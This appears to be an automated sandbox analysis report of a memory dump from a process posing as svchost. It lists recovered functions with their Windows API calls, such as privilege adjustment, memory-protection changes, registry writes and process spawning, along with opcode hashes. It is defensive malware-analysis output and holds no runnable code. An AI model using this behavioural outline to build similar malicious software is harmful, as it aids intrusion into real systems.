Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: File$CreateHeap$CopyFreeProcess
String ID:
API String ID: 2735472767-0
Opcode ID: 9a53bea9cf79c3366b480d347e7420bfb1f43002c67b28dbd88ec002c60dae92
Instruction ID: d8b745660a86084ea3f0dc2a7ecc3c59d21a901a5db572b9167ec2ce7d8d0aa1
Opcode Fuzzy Hash: 9a53bea9cf79c3366b480d347e7420bfb1f43002c67b28dbd88ec002c60dae92
Instruction Fuzzy Hash: EA014B7E80110CBFCF12ABA4DC09FDDBB3AEB04310F0845A1FD09A5164E7329A20EB90

Uniqueness

Uniqueness Score: -1.00%

Function 02892674 Relevance: 4.5, APIs: 3, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00008007), ref: 02892679

Part of subcall function 02892973: lstrcpyW.KERNEL32(028962F2,028963B4), ref: 0289298C
Part of subcall function 02892973: lstrcatW.KERNEL32(028962F0,02897338), ref: 0289299C
Part of subcall function 02892973: SetUnhandledExceptionFilter.KERNEL32(Function_000017E8), ref: 028929A7

Part of subcall function 028926ED: memset.MSVCRT ref: 02892709
Part of subcall function 028926ED: RtlGetVersion.NTDLL(?), ref: 0289271E

Part of subcall function 02893555: OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 02893570
Part of subcall function 02893555: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 02893585
Part of subcall function 02893555: GetLastError.KERNEL32 ref: 0289358B
Part of subcall function 02893555: GetProcessHeap.KERNEL32(00000008,00000001), ref: 028935A1
Part of subcall function 02893555: RtlAllocateHeap.NTDLL(00000000), ref: 028935A8
Part of subcall function 02893555: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 028935C1
Part of subcall function 02893555: GetSidSubAuthority.ADVAPI32(00000000,00000000), ref: 028935CF
Part of subcall function 02893555: FindCloseChangeNotification.KERNELBASE(00000000), ref: 028935F0
Part of subcall function 02893555: GetProcessHeap.KERNEL32(00000000,00000000), ref: 028935FD
Part of subcall function 02893555: HeapFree.KERNEL32(00000000), ref: 02893604

ExitProcess.KERNEL32 ref: 028926E6

Part of subcall function 028925E3: lstrcpyW.KERNEL32(?,02897328), ref: 028925F6
Part of subcall function 028925E3: CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 02892612
Part of subcall function 028925E3: CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 02892623
Part of subcall function 028925E3: GetLastError.KERNEL32 ref: 0289262D

Part of subcall function 02892C33: StrStrIW.KERNELBASE(028963B4,?), ref: 02892C67

Part of subcall function 02891BB9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02891BFF
Part of subcall function 02891BB9: HeapFree.KERNEL32(00000000), ref: 02891C06

Part of subcall function 02891FE9: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02891FF0
Part of subcall function 02891FE9: CreateThread.KERNELBASE(00000000,00000000,Function_00001482,00000000,00000000,00000000), ref: 02892009
Part of subcall function 02891FE9: FindCloseChangeNotification.KERNELBASE(00000000), ref: 02892014

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Create$ErrorEventToken$ChangeCloseFindFreeInformationLastNotificationlstrcpy$AllocateAuthorityExceptionExitFilterModeOpenThreadUnhandledVersionlstrcatmemset
String ID:
API String ID: 179549865-0
Opcode ID: 55eabe849ca87d6c78cab6ef60e2dd4fef477d5c42255bb10d76952cf27d0e48
Instruction ID: f406da294fdc67029c07e1e2b94d4aea7ebeea07a4e68ac8599b61b6d1d08412
Opcode Fuzzy Hash: 55eabe849ca87d6c78cab6ef60e2dd4fef477d5c42255bb10d76952cf27d0e48
Instruction Fuzzy Hash: 2FF039BC6803027EEE4137FD9C0AB1E255B5F00306F0C0860AD49D58DEDF1094214E37

Uniqueness

Uniqueness Score: -1.00%

Function 028929F5 Relevance: 3.1, APIs: 2, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 030794deba02a6a5c8b230c1a9b3e72f2a7d3010beebbb3ca5e1b0627c76025f
Instruction ID: f883f17d354d66f465a7b6d10bee98a2e46a8387c6069ade917136eb11bd889f
Opcode Fuzzy Hash: 030794deba02a6a5c8b230c1a9b3e72f2a7d3010beebbb3ca5e1b0627c76025f
Instruction Fuzzy Hash: DD51487E654302EFEB14CF68D850AA673E8FF88218F09486DF85AC7294E730E914CB51

Uniqueness

Uniqueness Score: -1.00%

Function 028954AC Relevance: 3.1, APIs: 2, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,00000000,00000000,00000000,?), ref: 028954C0
CreateDirectoryW.KERNELBASE(00000000,028962B8), ref: 02895500

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: CreateDirectoryFolderPath
String ID:
API String ID: 3690537876-0
Opcode ID: d5c20d5c019e520035418e5c4131aff8288f8cf50a1c9326f8b1435873f746c7
Instruction ID: b8cf4b53cb227e60f4edffa2823b43bd859da172b98d340ab988c7bc89a8bc51
Opcode Fuzzy Hash: d5c20d5c019e520035418e5c4131aff8288f8cf50a1c9326f8b1435873f746c7
Instruction Fuzzy Hash: 6A110BBE9002187EFB01A6A49C45DFF7FBCCF85650F180057F904D3140E52856069B71

Uniqueness

Uniqueness Score: -1.00%

Function 028955BC Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 028955D3
CreateDirectoryW.KERNELBASE(?,028962B8), ref: 0289561C

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: CreateDirectoryFolderPath
String ID:
API String ID: 3690537876-0
Opcode ID: cee82742ac44061157c000373a7f1acf9cd456443f3ed75c4b7c7716a7c20509
Instruction ID: eae837a625f3be3b6982fcc1c1c7fb7e6afa1818bdcf5149b4620ce057e70591
Opcode Fuzzy Hash: cee82742ac44061157c000373a7f1acf9cd456443f3ed75c4b7c7716a7c20509
Instruction Fuzzy Hash: FD01DDBEA4011C3EFF0166A9EC89D7FBF7CEB85B54B1C001BF905D2180ED5869048A75

Uniqueness

Uniqueness Score: -1.00%

Function 02891BB9 Relevance: 2.5, APIs: 2, Instructions: 34memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02891BFF
HeapFree.KERNEL32(00000000), ref: 02891C06

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: e0876e598c72d33894fc088e8fba5c67c79417031f8231d57746352dc8dab720
Instruction ID: f41d6d6421c23a1cfcba7c536e38f918dc8f10d296acc250bc2c068d51d6366a
Opcode Fuzzy Hash: e0876e598c72d33894fc088e8fba5c67c79417031f8231d57746352dc8dab720
Instruction Fuzzy Hash: 84F0307ED44109BBDF00EAE8CD09B9DB77CAB0430AF080591FA18E21C0E6719624DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 02893641 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,?,0000011C,?,?,?,?,?,?,?,?,02892790), ref: 02893659

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 725390c7a17dc412d8d021d53f8ed4f9e5c07de76a6498c64bb5360267aa2745
Instruction ID: 938b7e3ab71ad348c9de947968203a4cbfe33437ab56ec844c334d8df60f7add
Opcode Fuzzy Hash: 725390c7a17dc412d8d021d53f8ed4f9e5c07de76a6498c64bb5360267aa2745
Instruction Fuzzy Hash: 4BD0C233A1421C56CB00A6B9A9099CBF7FC9B8C610F0049A6E501E7180E862999442E0

Uniqueness

Uniqueness Score: -1.00%

Function 028929AE Relevance: 1.3, APIs: 1, Instructions: 22sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 02892BA4: NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000040,?), ref: 02892BDA
Part of subcall function 02892BA4: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?), ref: 02892C23

Sleep.KERNELBASE(000000FF), ref: 028929E9

Part of subcall function 02892674: SetErrorMode.KERNELBASE(00008007), ref: 02892679

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual$ErrorModeSleep
String ID:
API String ID: 46048798-0
Opcode ID: ecbdd9c6c89e3d519f70c514251e1cb0d76130745160d2c20497b52480120ae4
Instruction ID: a3f6b8ee20efef0c6cee1f8c7df219d2dba3dc67105df7b8e4259dbc9d29dcc1
Opcode Fuzzy Hash: ecbdd9c6c89e3d519f70c514251e1cb0d76130745160d2c20497b52480120ae4
Instruction Fuzzy Hash: 7DE0123E914121AFCE50A7A89908FD532E46F09315F0D0661AD25CF19DD7208C50CB52

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02893E7E Relevance: 12.1, APIs: 8, Instructions: 70encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,028973C8,00000001,F0000000,00000094,?), ref: 02893EA1
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,00000001), ref: 02893EBE
CryptHashData.ADVAPI32(?,?,00000000,00000000), ref: 02893ED4
CryptImportKey.ADVAPI32(?,00000000,00000094,00000000,00000000,?), ref: 02893EF1
CryptVerifySignatureA.ADVAPI32(?,00000000,00000080,00000000,00000000,00000000), ref: 02893F0D
CryptDestroyKey.ADVAPI32(?), ref: 02893F18
CryptDestroyHash.ADVAPI32(?), ref: 02893F26
CryptReleaseContext.ADVAPI32(?,00000000), ref: 02893F30

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$ContextDestroy$AcquireCreateDataImportReleaseSignatureVerify
String ID:
API String ID: 972346567-0
Opcode ID: b7a44f5a873c7f2f213766de5e827e7cf68cd19dc479e773a9b17716413cb74d
Instruction ID: e7b29153253ba2abc6d8a515300f0d12387d105558b2c571f415491530e94e67
Opcode Fuzzy Hash: b7a44f5a873c7f2f213766de5e827e7cf68cd19dc479e773a9b17716413cb74d
Instruction Fuzzy Hash: 7F21FC7AD40258FBCF229F96DD09E9FFF79EB85B01F084595F905A21A0D7318A20EB50

Uniqueness

Uniqueness Score: -1.00%

Function 02892F1A Relevance: 10.6, APIs: 7, Instructions: 71encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(02897658,00000000,00000000,00000001,F0000000,028962B0,?,?,?,02895B88,?,00000000,?,?,02897658,?), ref: 02892F35
CryptCreateHash.ADVAPI32(02897658,00008003,00000000,00000000,?,00000000,?,?,?,02895B88,?,00000000,?,?,02897658,?), ref: 02892F52
CryptHashData.ADVAPI32(?,02897658,?,00000000,?,?,?,02895B88,?,00000000,?,?,02897658,?), ref: 02892F68
CryptHashData.ADVAPI32(?,?,00000004,00000000,?,?,?,02895B88,?,00000000,?,?,02897658,?), ref: 02892F83
CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,?,02895B88,?,00000000,?), ref: 02892FA3
CryptDestroyHash.ADVAPI32(?,?,?,?,02895B88,?,00000000,?,?,02897658,?), ref: 02892FB3
CryptReleaseContext.ADVAPI32(02897658,00000000,?,?,?,02895B88,?,00000000,?,?,02897658,?), ref: 02892FC2

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$ContextData$AcquireCreateDestroyParamRelease
String ID:
API String ID: 276068997-0
Opcode ID: bd5b32789d4d9bf97968072fd68dd50e660aa38632f4b580a4d5e927b2691b18
Instruction ID: 136ce016f454a8b7ea4a4325f61144a9094b14db148de51b213cb160d6293564
Opcode Fuzzy Hash: bd5b32789d4d9bf97968072fd68dd50e660aa38632f4b580a4d5e927b2691b18
Instruction Fuzzy Hash: FF211ABA940219FFDF218F90DD85EAEBB7CEB04745F0845A5FE05A2154E7318E209BA0

Uniqueness

Uniqueness Score: -1.00%

Function 028939E8 Relevance: 7.5, APIs: 5, Instructions: 41COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?,?,02891210,?,028971F0,?), ref: 028939F4
OpenProcessToken.ADVAPI32(00000000,?,02891210,?,028971F0,?), ref: 028939FB
LookupPrivilegeValueA.ADVAPI32(00000000,028971F0,02891210), ref: 02893A11
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 02893A36
CloseHandle.KERNEL32(?,?,?,?,02891210,?,028971F0,?), ref: 02893A41

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3038321057-0
Opcode ID: 0336299b4f9b7aa242344f8c2cc950fae0afdfcc091756459102c414db88be3d
Instruction ID: 4b23d0a292131f10877b7b0a1c2a9133748f73453935fcab78d930f85a33ca36
Opcode Fuzzy Hash: 0336299b4f9b7aa242344f8c2cc950fae0afdfcc091756459102c414db88be3d
Instruction Fuzzy Hash: 17F03CBAD10118BBDB209B95DD0CEAFBFFCEB89B10F080595BC05E2140D7308A24CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 02894794 Relevance: 15.1, APIs: 10, Instructions: 143filesleepsynchronizationCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 02894830
CreateEventW.KERNEL32(028962B8,00000000,00000000,?), ref: 02894852
CreateFileMappingW.KERNEL32(000000FF,028962B8,00000004,00000000,00000000,?), ref: 02894886
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 0289489D
SetEvent.KERNEL32(00000000), ref: 028948D9
WaitForSingleObject.KERNEL32(?,00000BB8), ref: 028948EC
UnmapViewOfFile.KERNEL32(00000000), ref: 028948F3
CloseHandle.KERNEL32(?), ref: 02894903
CloseHandle.KERNEL32(?), ref: 02894910
CloseHandle.KERNEL32(00000000), ref: 02894917

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateEventView$MappingObjectSingleSleepUnmapWait
String ID:
API String ID: 3151294157-0
Opcode ID: 5d39c941ef2e1f4c4cc4e8f7fe53c84521f8b0d9c8e6cf182afd642ae36e7d56
Instruction ID: c3ed82e024a1f946070e6878bbaef18192277b6f476f82b307cff50f4068ea8a
Opcode Fuzzy Hash: 5d39c941ef2e1f4c4cc4e8f7fe53c84521f8b0d9c8e6cf182afd642ae36e7d56
Instruction Fuzzy Hash: EA41377D648385AFDB219F549C44FA7BBA8FF89751F08081DF589D6191DB30C406CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02891CD5 Relevance: 12.1, APIs: 8, Instructions: 115memorysleepstringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,-0000007F,00000001), ref: 02891CFD
RtlAllocateHeap.NTDLL(00000000), ref: 02891D04

Part of subcall function 02891F07: wsprintfA.USER32 ref: 02891F49

lstrcpy.KERNEL32(00000000,00000000), ref: 02891D2D
GetProcessHeap.KERNEL32(00000000,?), ref: 02891DF6
HeapFree.KERNEL32(00000000), ref: 02891DFD
Sleep.KERNEL32(00001388), ref: 02891E08
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02891E1A
HeapFree.KERNEL32(00000000), ref: 02891E21

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AllocateSleeplstrcpywsprintf
String ID:
API String ID: 4213899483-0
Opcode ID: 72f4630063a8d499ce8683f1d71574697ff15be62da0a68b3e63399d12320a0c
Instruction ID: 81305b6d58f3a78e42d5b2c730beae6831491d81bf369c87dbcb3b1576224ef5
Opcode Fuzzy Hash: 72f4630063a8d499ce8683f1d71574697ff15be62da0a68b3e63399d12320a0c
Instruction Fuzzy Hash: F1415BBD9083029FDB209F69D848B1BBBE8FF88715F08492EF599C2190D770D514CB66

Uniqueness

Uniqueness Score: -1.00%

Function 02891E38 Relevance: 12.1, APIs: 8, Instructions: 81memorystringthreadCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,?,?,?,?,02891148,00000009,00000000,028971E0,00000007), ref: 02891E47
GetProcessHeap.KERNEL32(00000008,-0000000B,?,?,?,?,02891148,00000009,00000000,028971E0,00000007), ref: 02891E67
RtlAllocateHeap.NTDLL(00000000), ref: 02891E6E
lstrcpy.KERNEL32(0000000C,00000000), ref: 02891E97
CreateThread.KERNEL32(00000000,00000000,02891F56,00000000,00000000,00000000), ref: 02891EDB
CloseHandle.KERNEL32(00000000,?,?,?,?,02891148,00000009,00000000,028971E0,00000007), ref: 02891EE6
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,02891148,00000009,00000000,028971E0,00000007), ref: 02891EF3
HeapFree.KERNEL32(00000000,?,?,?,?,02891148,00000009,00000000,028971E0,00000007), ref: 02891EFA

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateCloseCreateFreeHandleThreadlstrcpylstrlen
String ID:
API String ID: 3086719409-0
Opcode ID: 2f1c1beaebe1652e3560b999b9222be55e6fddf89df145cac548634bbe38b213
Instruction ID: dbae7c3df733f770a9a6fbaa70d9c659d41e6e7f80cf63335c91291043f1c738
Opcode Fuzzy Hash: 2f1c1beaebe1652e3560b999b9222be55e6fddf89df145cac548634bbe38b213
Instruction Fuzzy Hash: 4321B17D90874BAFDB118F65CC8CA6BBBACFF05658B088918E84EC6244D770E814CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0289598A Relevance: 10.6, APIs: 7, Instructions: 100memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 028959D3
GetProcessHeap.KERNEL32(00000008,00000000), ref: 028959E8
RtlAllocateHeap.NTDLL(00000000), ref: 028959EF
RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,-00000001,?), ref: 02895A09
GetProcessHeap.KERNEL32(00000000,?), ref: 02895A1E
HeapFree.KERNEL32(00000000), ref: 02895A25
RegCloseKey.ADVAPI32(00000000), ref: 02895A2C

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$ProcessQueryValue$AllocateCloseFree
String ID:
API String ID: 1930173803-0
Opcode ID: a884b5e9d4dcf3bca8dfc672d95c1063f9240355555d0de24aef1cb475834043
Instruction ID: 7aacc0a0318609d630f62d126c1e2a5235cbf2996455ea0d815f335407bb71ad
Opcode Fuzzy Hash: a884b5e9d4dcf3bca8dfc672d95c1063f9240355555d0de24aef1cb475834043
Instruction Fuzzy Hash: 9231D17D250205AFEB229F249C84B3BB7ECEB49715F0C4828F985CB280E778D8158A61

Uniqueness

Uniqueness Score: -1.00%

Function 028915D5 Relevance: 10.6, APIs: 7, Instructions: 75memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 028915E4
GetProcessHeap.KERNEL32(00000008,-00000103), ref: 028915FA
RtlAllocateHeap.NTDLL(00000000), ref: 02891601

Part of subcall function 028956E6: GetTempPathA.KERNEL32(00000104,?), ref: 028956F7

Part of subcall function 02892E5A: CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 02892E75

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02891669
HeapFree.KERNEL32(00000000), ref: 02891670
GetProcessHeap.KERNEL32(00000000,?), ref: 02891683
HeapFree.KERNEL32(00000000), ref: 0289168A

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AllocateCreateFilePathTemplstrlen
String ID:
API String ID: 953720001-0
Opcode ID: 59452e88446e746937affaef49514adac3a279e579cdb15770658127745bde4e
Instruction ID: 7c53ff170d68b585023b7a76a71e1ff755a6788e01f022b0541077811c37939f
Opcode Fuzzy Hash: 59452e88446e746937affaef49514adac3a279e579cdb15770658127745bde4e
Instruction Fuzzy Hash: 3B11CDBE958206BBEB025FA49C4CF7ABB6CEB4A715F0C4819FA49C1081DB3494208B75

Uniqueness

Uniqueness Score: -1.00%

Function 02894E55 Relevance: 10.6, APIs: 7, Instructions: 62memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000002,00000000,?,?,028949A2,00000000,00000000,?,00000000,00000000,028970E8), ref: 02894E70
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02894E77
CreateThread.KERNEL32(00000000,00000000,02894F6B,00000000,00000000,00000000), ref: 02894EAA
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,028970E8), ref: 02894EB6
HeapFree.KERNEL32(00000000,?,00000000,00000000,028970E8), ref: 02894EBD
CloseHandle.KERNEL32(00000000,00000000,?,?,028949A2,00000000,00000000,?,00000000,00000000,028970E8), ref: 02894ECD
CloseHandle.KERNEL32(00000000,?,00000000,00000000,028970E8), ref: 02894EDF

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$CloseHandleProcess$AllocateCreateFreeThread
String ID:
API String ID: 1729137577-0
Opcode ID: 026efd00e0cac9a56e5df9e1a4fa29708826b6287a063e814a56c934d674c75a
Instruction ID: 49c0af0d2ea0fb3b930cdaeefb481c69a15321f6d7efd90ee55032691a83eb39
Opcode Fuzzy Hash: 026efd00e0cac9a56e5df9e1a4fa29708826b6287a063e814a56c934d674c75a
Instruction Fuzzy Hash: B5116B7DF5432267DB214E745C0DF2FAB5DAF49A25F0D4A14F945DA1C8C720C8028BB0

Uniqueness

Uniqueness Score: -1.00%

Function 028958A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringprocessCOMMON

Download Yara Rule

APIs

Part of subcall function 02892EBA: CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,02892D76,?,?,?,?), ref: 02892ED5

memset.MSVCRT ref: 028958E2
lstrcpyW.KERNEL32(?,028963B4), ref: 0289590D
lstrcatW.KERNEL32(?,0289764C), ref: 0289591F
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0289593B
ExitProcess.KERNEL32 ref: 02895946

Strings

D, xrefs: 028958EA

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: CreateProcess$ExitFilelstrcatlstrcpymemset
String ID: D
API String ID: 898148731-2746444292
Opcode ID: 3c1ebcc827b69d7bca09554bfb020e59d2fc23e87201844d1d47b140083363e1
Instruction ID: a1d2c3cbc1e3ca1fbe76946676aec70d477642f0f0a598fe346284157ea0c87f
Opcode Fuzzy Hash: 3c1ebcc827b69d7bca09554bfb020e59d2fc23e87201844d1d47b140083363e1
Instruction Fuzzy Hash: 521130BA900208AFDF119FE4DC49F9A77BCEF44715F084461FA09D6144E7389A148B65

Uniqueness

Uniqueness Score: -1.00%

Function 02893BE0 Relevance: 9.1, APIs: 6, Instructions: 118memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 02893BF9
RtlReAllocateHeap.NTDLL(00000000), ref: 02893C4D
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000104,00000000,00000000), ref: 02893CB5
HeapFree.KERNEL32(00000000), ref: 02893CEB
HeapFree.KERNEL32(00000000), ref: 02893D00

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Free$AllocateByteCharCurrentMultiProcessWide
String ID:
API String ID: 3321845206-0
Opcode ID: 0d9892c0df0c3bb0f2851b902a9c9a2cf4efa5bfe26bc6dd06daab0eb443125e
Instruction ID: d1b6180ca39cfd8695dc711a3c0377480825c05f2bd141ba6de2b2096b77b0fb
Opcode Fuzzy Hash: 0d9892c0df0c3bb0f2851b902a9c9a2cf4efa5bfe26bc6dd06daab0eb443125e
Instruction Fuzzy Hash: 4231C47D609715AFFF209B648C48F7BBA9CEF44B4DF0C0858B94AC6080E760E854CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02895A75 Relevance: 9.1, APIs: 6, Instructions: 92memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,00000001), ref: 02895ACA
RtlAllocateHeap.NTDLL(00000000), ref: 02895AD1
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000003,00000000,?,00000001), ref: 02895B24
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02895B2F
HeapFree.KERNEL32(00000000), ref: 02895B36
RegCloseKey.ADVAPI32(?), ref: 02895B3D

Memory Dump Source

Source File: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Offset: 02891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2891000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateCloseFreeValue
String ID:
API String ID: 1659168586-0
Opcode ID: 8700b09d04eb384f07ac52e47439a96e1ff1abbc6fdb29db0a80b214c9fbff6f
Instruction ID: 0f7da872c0a1c6b23381934e074ce56649c0e66cb1f753095c48f7a3fada189f
Opcode Fuzzy Hash: 8700b09d04eb384f07ac52e47439a96e1ff1abbc6fdb29db0a80b214c9fbff6f
Instruction Fuzzy Hash: 0321607E7443145BCB325E749C54B37BB9CDF89A10F4C4519F685DB281DB78D80587A0

Uniqueness

Uniqueness Score: -1.00%

Function 02892482 Relevance: 9.1, APIs: 6, Instructions: 71memorystringsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000), ref: 028924B4
lstrlen.KERNEL32(00000000), ref: 028924D7
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02892524
HeapFree.KERNEL32(00000000), ref: 0289252B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0289254C
HeapFree.KERNEL32(00000000), ref: 02892553

Memory Dump Source

